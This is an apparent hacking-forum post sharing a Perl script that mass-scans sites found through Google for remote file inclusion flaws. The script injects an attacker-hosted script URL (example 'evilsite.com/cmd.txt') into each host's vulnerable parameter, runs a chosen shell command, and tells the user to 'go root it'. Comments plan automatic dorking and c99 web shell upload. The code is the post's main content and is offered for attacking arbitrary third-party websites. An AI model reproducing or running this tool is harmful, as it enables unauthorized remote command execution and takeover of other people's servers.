This is the first perl program I have released, as I just learned perl like 2 days ago. But I got this idea and figured it would be pretty useful. If people like it there are features im working on adding. Most people should know how to use this. Once you find a new remote file include vuln you google it, and copy and paste all the urls you get into a notepad and name it list.txt and use that as your host file. Then you just have to put in the actual remote include code once, and it scans and executes a command, returns the command, and gives you the full working path, and im adding new stuff. 

Let me know what you think. 
--------------------------

Code: 
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
#Remote File Include Vuln list scanner by L0s3r 4n71_D3f14n7 
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
#Coded in perl. 
#This is a pretty simple scanner that takes the user supplied remote file include info and sends the 
#specified get request to each host. Once the response data is all collected, it displays whether or not 
#it found the search string, and also in case the search string method fails, it also shows the first 50 
#characters returned. 
#The aim of this script is just to make scanning hosts you collect off google easier. Just learned perl so is not 
#perfect but it works. 
# 
#Im currently working on automatically getting the search results from google, and stripping all the urls down 

#directly into the program, so you would just have to have the remote include code, and a dork, the script does the 

#rest. If anyone wants to help me on that let me know. 
#Another idea is to add an option for automatic c99 upload, and then in the report it would give you the url. 
#next version will use the echo command to test if the site is vuln, will issue an echo command and if the data 

#returned back has the echo word in it, then host is vulnerable. but as far as i have encountered, the current test 

#works too 

use Getopt::Std; 
use LWP::UserAgent; 

getopts("c:l:"); 

#$exploit   = $opt_e; cant get the cmd line to ignore the &cmd part of the vuln url 
$cmd      = $opt_c; 
$list      = $opt_l; 
#$var      = $opt_v; same problem here as above ^^ 

$|++; 

top(); 
if(!$cmd||!$list) { usage(); } 

#get user supplied file inclusion path for exploit and get cmd var 

print "File Inclusion Path? ie:/cart.php?cart_root=http://evilsite.com/cmd.txt?\n"; 

$exploit = <>; 

print "Remote command variable?. Or hit enter for default(&cmd=)"; 
$var = <>; 
chomp($var); 

if(!$var) {$var = "&cmd=";} 

print "Working, please wait"; 

#do while loop here, that searches through the text file and gets the hosts, it sends the request, and recieves and 
#stores the data to be displayed after the scan 

#declare i for counter 
my $i = 0; 

open INPUT, "<$list"; 
while ( <INPUT> ) 
{ 
   #put send request here dont forget to chomp 
   $host=$_; 
   chomp($host); 
   chomp($exploit); 
   $browser = LWP::UserAgent->new() or die; 
   $browser->agent( 'Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)' ); 
   $request = HTTP::Request->new(GET =>$host.$exploit.$var.$cmd)or die "\nCould Not connect\n\n\n"; 
   $response = $browser->request($request); 
   $contents[$i] = $response->content; 
   print "."; 

   #array for host display on results page 
   $hostarray[$i] = $host; 
    
      #increment my counter to display array values 
   $i += 1; 
} 

#this area of code displays the results of the scan. 
print "\n"; 
while($i > 0) 
{ 
$i -= 1; 

   #if statement that checks for "<", if exploit is successful, no html should be returned. 
   if (index($contents[$i], "<") == -1) 
   { print "\nResults for host ".$hostarray[$i]."\n********Vulnerable******** Good Job... Now go root 

it.\nResults of your command:\n".substr $contents[$i], 0, 100;####You can change this number to display more text 
   print "\nThe full exploit url is:\n".$host.$exploit.$var.$cmd; 
   } else { 
      print "\nResults for host ".$hostarray[$i]."\nNot Vulnerable. Better luck next time.\nReceived data 

for diagnosis:\n".substr $contents[$i], 0, 50;####You can change this number to display more text 
      } 
#to make it look more legible 
print "\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r"; 

} 

sub top() 
 { 
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";    
 print " Remote File Include Vuln list scanner by L0s3r 4n71_D3f14n7\r\n"; 
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
 } 

sub usage() 
 { 
 print "script.pl -c <cmd> -l <list>\r\n\r\n"; 
 #print "<exploit> - remote file include code\r\n"; 
 print "<cmd>      - cmd to be executed\r\n"; 
 print "<list>       - location of txt file with hosts. Leave off the last /\r\n"; 
 #print "<cmd var>  - cmd var of remote evil script ie: &cmd=\n\n"; 
 exit(); 
 }